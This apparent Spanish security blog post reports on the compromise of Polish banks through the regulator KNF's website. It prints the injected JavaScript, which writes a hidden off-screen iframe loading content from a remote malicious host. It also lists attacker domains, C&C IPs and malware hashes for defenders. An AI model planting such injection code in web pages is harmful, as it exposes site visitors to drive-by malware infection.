Hackean varios bancos en Polonia infectándoles a través de un Organismo Financiero Gubernamental

Esta semana ha saltado a la primera plana internacional el que ya está considerado como el mayor incidente de Ciberseguridad en la historia de Polonia: varios bancos del país han sido víctimas de un Malware y la fuente de la infección fue la Autoridad de Supervisión Financiera de Polonia (KNF), organismo oficial encargado precisamente de garantizar la seguridad en el sector financiero.

 

Por el momento se desconoce el número total de bancos afectados aunque se teoriza sobre unas 20 entidades distintas y se ha reportado la infección tanto de estaciones de trabajo como de servidores en varias instituciones bancarias de Polonia. Solamente se ha confirmado la exfiltración de datos e información confidencial y se ha descartado el robo de dinero o manipulación de cuentas bancarias, aunque el tráfico detectado contenía gran cantidad de datos cifrados por lo que es imposible discernir de momento el contenido.

La información es a día de hoy escasa y difusa, ya que está siendo controlada con cuentagotas para mitigar el posible pánico que pudiera desencadenar entre usuarios y clientes. 

 
El detonante de la investigación fue la detección de tráfico inusual a localizaciones exóticas y el hallazgo de ciertos ejecutables cifrados en servidores de varias entidades, quienes al cotejar los resultados de sus análisis y las IOC dieron la voz de alarma.

Vía de Entrada

Las primeras investigaciones señalan que el punto de partida de la infección fue el servidor web del regulador financiero polaco antes mencionado, KNF: www.knf.gov.pl
 
Dicha web ha permanecido caída durante los últimos días y hoy durante toda la jornada únicamente ha sido accesible desde Polonia y ha estado bloqueando por geolocalización toda conexión externa.
Mensaje de error en la web del KNF
Bloqueo por geolocalización de la web del KNF: conexión desde fuera y dentro de Polonia
 
El artículo de BadCyber escrito por varios analistas que han tenido acceso privilegiado a la investigación relata que el código de una librería Javascript de dicho servidor habría sido alterado para cargar un fichero Javascript o JSP externo alojado en un servidor remoto, aunque se desconoce cómo se habría logrado en primera instancia dicha modificación inicial.
 
El código malicioso inyectado estaba localizado en el fichero:
hxxp://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11

Y consistía en las siguiente líneas:

document.write("<div id='efHpTk' width='0px' height='0px'><iframe 
name='forma' src='hxxps://sap.misapor.ch/vishop/view.jsp?pagenum=1' 
width='145px' height='146px' style='left:-2144px;position:absolute;top:0px;
'></iframe></div>");

Dicho fragmento de Javascript varía de unas versiones a otras en cuanto a la URL y el fichero que carga. A continuación una lista de todos posibles dominios maliciosos encontrados y relacionados con el ataque:

  • sap.misapor.ch 
  • www.eye-watch.in
  • ocmlaptops.co.uk
  • ournepal.com 
  • impacthomes-my.sharepoint.com
  • pharmacareaus-my.sharepoint.com
  • cpsnortherngroup.com 
  • Polakwchinach.pl
Se desconoce el contenido de dichos ficheros Javascript/JSP ya que los recursos parecen no estar disponibles y los servidores devuelven un HTTP 404 o un HTTP 202 con un archivo sin contenido. 
Se cree firmemente que descargaba un fichero en el equipo de la víctima el cual al ser ejecutado realizaba conexiones con varios servidores controlados por los atacantes permitiéndoles funcionalidades como tomar el control del equipo y propagarse por la red interna.

Servidor C&C

En los logs analizados de equipos infectados se han detectado conexiones a dos IPs distintas:

  • 125.214.195.17
  • 196.29.166.218

Detrás de una de esas IPs parece haber un servidor en Sudán bastante abierto:

 

 
 
Fuente de las imágenes: https://twitter.com/v0id_hunter/status/828693925057675265


Malware

Aun no está clara la autoría de estos ataques, pero los análisis forenses pertinentes dejan entrever que el problema se remonta a mediados de 2016, lo que significa que los bancos han sido víctimas del espionaje durante más de 6 meses.

El malware utilizado en Polonia usa packers comerciales y múltiple ofuscadores, recurre al cifrado de ficheros y tráfico, y en el momento de los análisis ningún Antivirus era capaz de detectarlo. El payload final tenía las funcionalidades de un RAT común.

Ciertos analistas destacan como posible candidato a relacionar con dicho malware a una APT bautizada como “Bluenoroff” que fue detectada en 2016 y cuya incidencia se ha disparado en los últimos meses. 

El siguiente informe de Telefónica del pasado noviembre habla sobre dicha APT basándose en análisis realizados por Karspersky sobre una muestra obtenida de un ataque al Banco de Indonesia. Según el citado documento, “Bluenoroff” fue el malware utilizado en los ataques contra el sistema SWIFT en Bangladesh, Indonesia, India y otros países del sudeste asiático, y presenta similitudes con otro usado previamente en ataques contra bancos en Vietnam.

A la espera de nuevos avances en las investigaciones, de momento sólo se han compartido los hashes de algunas de las muestras analizadas:

MD5
C1364BBF63B3617B25B58209E4529D8C
85D316590EDFB4212049C4490DB08C4B
1BFBC0C9E0D9CEB5C3F4F6CED6BCFEAE


SHA1 
496207DB444203A6A9C02A32AFF28D563999736C
4F0D7A33D23D53C0EB8B34D102CDD660FC5323A2
BEDCEAFA2109139C793CB158CEC9FA48F980FF2B
SHA256 
FC8607C155617E09D540C5030EABAD9A9512F656F16B38682FD50B2007583E9B
D4616F9706403A0D5A2F9A8726230A4693E4C95C58DF5C753CCC684F1D3542E2
CC6A731E9DAFF84BAE4214603E1C3BAD8D6735B0CBB2A0EC1635B36E6A38CB3A
 
 
 
About Gustavo Genez 365 Articles
Informático de corazón y apasionado por la tecnología. La misión de este blog es llegar a los usuarios y profesionales con información y trucos acerca de la Seguridad Informática.